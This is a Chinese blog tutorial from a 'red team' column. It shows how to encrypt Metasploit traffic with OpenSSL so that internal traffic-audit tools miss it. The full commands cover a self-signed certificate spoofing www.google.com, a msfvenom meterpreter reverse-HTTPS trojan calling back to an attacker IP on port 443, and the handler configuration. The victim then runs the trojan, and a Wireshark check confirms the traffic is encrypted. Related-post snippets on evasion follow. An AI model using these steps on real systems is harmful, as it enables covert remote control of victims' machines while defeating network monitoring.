红队隧道加密之MSF流量加密(二)

已于 2022-11-26 13:53:51 修改
阅读量2.1k 收藏 10
点赞数 7
分类专栏: 红队的自我修养 文章标签: 网络安全 web安全 网络攻击模型
于 2022-11-26 13:52:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/128051211
版权

前言

如今大多数企业的内网都部署了流量审计服务, 用来专门分析流量特征, 比如后门特征和行为特征

若直接使用Metasploit对内网进行横向渗透, 其产生的流量会很容易被内网防护工具检测出来, 因此需对流量进行加密来绕过检测

这里介绍使用OpenSSL对MSF流量进行加密


演示步骤

1.OpenSSL创建证书SSL/TLS证书

在攻击机Kali输入如下命令生成www..google.com.pem证书文件

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt

image-20221107110103415


在当前目录查看生成的证书文件: cat www..google.com.pem

image-20221107111248924


2.生成MSF木马

在证书文件所在目录输入如下命令生成msf木马

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.47.134 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o msf.exe

image-20221107111434221


3.MSF开启监听

此处配置监听还需设置两个额外选项:

  • set handlersslcert: 设置处理程序时将使用的证书
  • set StagerVerifySSLCert: 设置接收到连接时执行SSL证书验证
msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_winhttps
payload => windows/meterpreter/reverse_winhttps
msf5 exploit(multi/handler) > set lhost 192.168.47.134
lhost => 192.168.47.134
msf5 exploit(multi/handler) > set lport 443
lport => 443
msf5 exploit(multi/handler) > set handlersslcert /root/www.google.com.pem
handlersslcert => /root/www.google.com.pem
msf5 exploit(multi/handler) > set stagerverifysslcert true
stagerverifysslcert => true

image-20221107170236469


访问https://192.168.47.134, 查看此网页的证书

1

1


4.受害机上线

将msf木马丢到受害机中运行, 随后msf服务端收到目标主机的meterpreter会话

注意: 经过测试, 操作系统为win7的受害机不会上线

image-20221107171548194


抓包分析

先在meterpreter会话命令行随便输条指令, 这里输入getuid

image-20221107172759201


随后打开wireshark抓取msf服务端与受害机之间的流量数据包, 可发现此流量使用了TLS协议加密

image-20221107172425839


追踪TCP流, 在tls加密前这里的数据是明文数据, 而现在是加密后的乱码数据

1

Henry404s
关注
专栏目录
MSF流量加密躲避检测
m0_50526465的博客
05-04 574
MSF流量加密躲避检测 对于OpenSSL不了解的,可以去看下我上一篇文章 使用Openssl加密 生成证书 这里C=UK;ST=London等可以对应下面的HTTPS证书看就明白是怎么回事了 openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \ -subj "/C=UK/ST=London/L=London/O=Development/CN=www.baidu.com" \ -keyout www.baidu.com.key \ -out w
msf cs openssl流量加密
bwt_D的博客
05-29 754
OpenSSL反弹加密shell OpenSSL是一个开放源代码的软件库爆,应用程序可以使这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上 在kali上使用OpenSSL生成自签名证书 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes 在kali上监听端口 openssl s_server -quiet -key key.pem -cert
MSF-流量通讯特征修改-证书-OpenSSL&impersonate_ssl
最新发布
金灰的博客
06-24 529
免责声明:本文仅做技术交流与学习...-解决 HTTPS-SSL 通讯证书被特征标示问题。
MSF流量加密
Welcome To Myon'Blog !
01-13 629
MSF中生成shell,并上线运行时。都是通过`http` `https` `tcp`等协议传输。虽然MSF本身会对流量进行加密,但MSF太出名以致于其加密特征容易被IPS,WAF等可以检测带有攻击的特征的设备拦截或记录。
红蓝对抗之流量加密(Openssl加密传输、MSF流量加密、CS修改profile进行流量加密)
qq_50854662的博客
06-01 1230
红蓝对抗之流量加密(Openssl加密传输、MSF流量加密、CS修改profile进行流量加密)
网络安全进阶篇之流量加密(十三章-2)MSF流量加密躲避检测
划水的小白白
05-19 3416
文章目录一、为什么要加密、创建证书三、上线MSF四、抓取流量测试五、不上线的情况5.1、经过测试win7系统无法上线。5.2、看看配置是否正确 一、为什么要加密 为了防止主机被入侵,现在大部分的内网环境都装有流量审计工具, 专门用来分析审查流量特征,分析网络流量,如后门特征、行为特征, 像 metasploit 在内网做横行渗透时,这些流量很容易就能被检测出来, 所以做好流量加密,就能避免审计工具检测出来。 大概过程: 使用openssl生成加密正常, msf生成木马的时候将证书加进去, 设置
MSF流量加密_msf 流量加密网络安全进程保活黑科技实现原理解密及方法
2401_84181286的博客
04-10 379
我这里是 msf6使用 ls 命令查前面生成的相应证书和文件。
MSF流量加密_msf 流量加密,2024最新阿里网络安全高级面试题总结
HUAXIAL的博客
04-08 375
MSF中生成shell,并上线运行时。都是通过httphttpstcp等协议传输。虽然MSF本身会对流量进行加密,但MSF太出名以致于其加密特征容易被IPS,WAF等可以检测带有攻击的特征的设备拦截或记录。
红队APT】反朔源&流量加密&CS&MSF&证书指纹&C2项目&CDN域前置
11-16
常见的流量加密技术包括SSL、TLS等。 CS和MSF是两种常见的渗透测试工具,分别是Cobalt Strike和Metasploit Framework的缩写。这两个工具都可以用于渗透测试和红队行动。 证书指纹是指数字证书中的一个唯一标识,...
流量加密技术
课嗨教育的专栏
09-09 1311
目录 一、使用 Openssl 反弹加密 shell ​ MSF 流量加密躲避检测 一、使用 Openssl 反弹加密 shell 红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要横行渗透,往往 需要反弹 shell,如果反弹 shell 都是明文传输,那么内网里有 IDS 或者防护软件 会进行流量进行分析,检测带有攻击特征,很快被发现,如果蓝队对攻击流量回 溯分析,就可以复现攻击的过程。此时红队攻击就会暴漏出来,整个项目都要停 止。 使用 wireshark 抓包直接
红蓝对抗之红队免杀开发实践
悦分享
08-04 1912
我们在这个加载程序中执行的beacon shellcode最终是一个需要在内存中执行的DLL。许多C2框架利用了Stephen Fewer的。解析加载DLL所需kernel32.dll WINAPI的地址(例如VirtualAlloc, LoadLibraryA等);将DLL及其相应的节写入内存中;建立DLL导入表,以便DLL可以调用ntdll.dll和kernel32.dll WINAPI;加载额外的库并解析其导入函数地址;调用DLL的入口点。...
红队攻防渗透技术实战流程:红队目标上线之免杀对抗-Webshell篇&静态查杀&行为拦截&流量监控&代码混淆&内存加载&工具魔改
HACKONE的博客
05-27 332
上面的实验代表了webshell查杀的几个特征:表面代码只能解决代码表面的查杀操作行为哥斯拉执行命令无提示antsword执行命分有提示哥斯拉执行命令无提示但是执行net user 有提示antsword执行命分有提示工具指纹源码魔改(指纹打乱,调用逻辑(行为绕过))对抗:流量产品 和 杀毒产品换冷内工具(自己写的工具)让产品没来得及集成这个工具的检测导致绕过(特征库)
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 321
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
msf后门流量分析
2301_76227305的博客
04-15 1669
以上就是msf后门流量的特征啦最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
应急响应-MSF流量分析&模式模块&特征提取
siu~
04-13 1213
战后-流量分析-MSF
流量加密小结
RestoreJustice的博客
09-17 321
红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要进行横行渗透,所以需要拿到shell建立与目标之间的通信,当目标主机网络环境存在网络防御检测系统时(IDS、IPS等),如果攻击机与目标间通信的流量是明文传输,那么网络防御检测系统会检测出通信内容中带有的攻击特征,并对当前通信进行告警和阻止
webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)
热门推荐
黄乔国PHP
03-22 1万+
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。在流量层,冰蝎的aes特征一直是厂商查杀的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值